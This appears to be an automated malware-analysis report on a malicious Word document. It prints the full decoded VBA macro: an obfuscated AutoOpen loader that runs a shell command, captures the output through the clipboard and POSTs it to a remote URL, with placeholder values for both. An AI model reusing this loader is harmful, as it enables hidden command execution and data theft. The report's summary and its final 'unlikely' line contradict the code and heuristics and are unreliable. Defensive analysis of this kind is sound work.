Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 148d280586de3a62…

MALICIOUS

Office (OOXML)

17.5 KB Created: 2018-04-17 01:33:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2019-06-27
MD5: 54e656314099112450323bc75e3f9dbd SHA-1: e61f5f699471bed8e6b0bf4f9ee420e69bede4f7 SHA-256: 148d280586de3a62d366c396c8bfedd6683a2e3eb1c3d956da57dbfc19d1983c
330 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is a malicious OOXML document containing an AutoOpen VBA macro. This macro is obfuscated and uses CreateObject to instantiate WinHttpRequest, which is then used to send an HTTP POST request. The purpose of this request is to download and execute a second-stage payload, as indicated by the high-severity heuristics and the structure of the VBA code.

Heuristics 8

  • ClamAV: Doc.Malware.Valyria-6923224-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6923224-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3191 bytes
SHA-256: 93b1bde4679b97b6965195eeb9eaf832010c6e6d5b5fca48629f4a51350d0197
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const obqcjcipwr = 2
Const nqzmmphczc = 1
Const dgdwhcjwgd = 0
Dim aqupzpwhbcanwadydm As String
Sub AutoOpen()
uxbgfgxxidjacay
End Sub
Private Sub uxbgfgxxidjacay()
Dim qpabwxoyzacrydhs As String
aqupzpwhbcanwadydm = ntmmvwjmbhss("3c3c3c54454d") & ntmmvwjmbhss("504c4154453e3e3e")
qpabwxoyzacrydhs = ntmmvwjmbhss("3c3c") & ntmmvwjmbhss("3c54454d504c4154453e3e3e")
On Error GoTo byebye
qpabwxoyzacrydhs = wigqybngxiuerdkk(qpabwxoyzacrydhs)
yxqehztnhpwokt qpabwxoyzacrydhs
On Error GoTo 0
byebye:
End Sub
Private Function dfauvacdtfjmqltamojd(sffekictlnktvmpwboxn As String, iwrqjyklkc As String)
Dim gkgglwmptzwmhgj As Object
Set gkgglwmptzwmhgj = CreateObject(ntmmvwjmbhss("57696e487474702e57696e4874") & ntmmvwjmbhss("7470526571756573742e352e31"))
gkgglwmptzwmhgj.Option(4) = 13056
gkgglwmptzwmhgj.Open ntmmvwjmbhss("504f53") & ntmmvwjmbhss("54"), sffekictlnktvmpwboxn, False
gkgglwmptzwmhgj.setRequestHeader ntmmvwjmbhss("557365") & ntmmvwjmbhss("722d4167656e74"), ntmmvwjmbhss("4d6f7a696c6c612f342e302028636f6d70617469626c653b204d53494520362e303b2057696e646f777320") & ntmmvwjmbhss("4e5420352e3029")
gkgglwmptzwmhgj.setRequestHeader ntmmvwjmbhss("436f") & ntmmvwjmbhss("6e74656e742d74797065"), ntmmvwjmbhss("6170706c69636174696f6e2f782d7777772d666f726d2d75") & ntmmvwjmbhss("726c656e636f646564")
gkgglwmptzwmhgj.SetTimeouts 2000, 2000, 2000, 2000
gkgglwmptzwmhgj.send (iwrqjyklkc)
dfauvacdtfjmqltamojd = gkgglwmptzwmhgj.responseText
End Function
Private Function dtdlssmszk() As String
Dim ojbexfkkyrqjtzvbzpd As String
Dim wxxyrjduxfcpyubqcgcy As String
wxxyrjduxfcpyubqcgcy = Environ(ntmmvwjmbhss("43") & ntmmvwjmbhss("4f4d50555445524e414d45")) & ntmmvwjmbhss("20") & Environ(ntmmvwjmbhss("4f53"))
dtdlssmszk = wxxyrjduxfcpyubqcgcy
End Function
Private Function yxqehztnhpwokt(cmdOutput)
Dim iwrqjyklkc As String
Dim nkczsyptgfcuaffrrfoj As String
iwrqjyklkc = ntmmvwjmbhss("69643d") & GetId & ntmmvwjmbhss("26636d644f7574707574") & ntmmvwjmbhss("3d") & cmdOutput
yxqehztnhpwokt = dfauvacdtfjmqltamojd(aqupzpwhbcanwadydm, iwrqjyklkc)
End Function
Private Function wigqybngxiuerdkk(loaqvnscatvtgzktu As String) As String
Dim ncfdrmqzjaljbz As String
ncfdrmqzjaljbz = ntmmvwjmbhss("636d642e65786520") & ntmmvwjmbhss("2f6320") & loaqvnscatvtgzktu & ntmmvwjmbhss("207c20636c") & ntmmvwjmbhss("6970")
CreateObject(ntmmvwjmbhss("575363726970742e536865") & ntmmvwjmbhss("6c6c")).Run ncfdrmqzjaljbz, dgdwhcjwgd, True
wigqybngxiuerdkk = CreateObject(ntmmvwjmbhss("68") & ntmmvwjmbhss("746d6c66696c65")).ParentWindow.ClipboardData.GetData(ntmmvwjmbhss("74") & ntmmvwjmbhss("657874"))
End Function
Private Function ntmmvwjmbhss(ByVal qtahxdauwhbm As String) As String
Dim tuatsquuoebf As Long
For tuatsquuoebf = 1 To Len(qtahxdauwhbm) Step 2
ntmmvwjmbhss = ntmmvwjmbhss & Chr$(Val("&H" & Mid$(qtahxdauwhbm, tuatsquuoebf, 2)))
Next tuatsquuoebf
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 13312 bytes
SHA-256: 0164fe53d8a6a6a9472d3cb7229425077e45dc5f51c86b2c150f6da1a9f242cf
Detection
ClamAV: Doc.Malware.Valyria-6923224-0
Obfuscation or payload: unlikely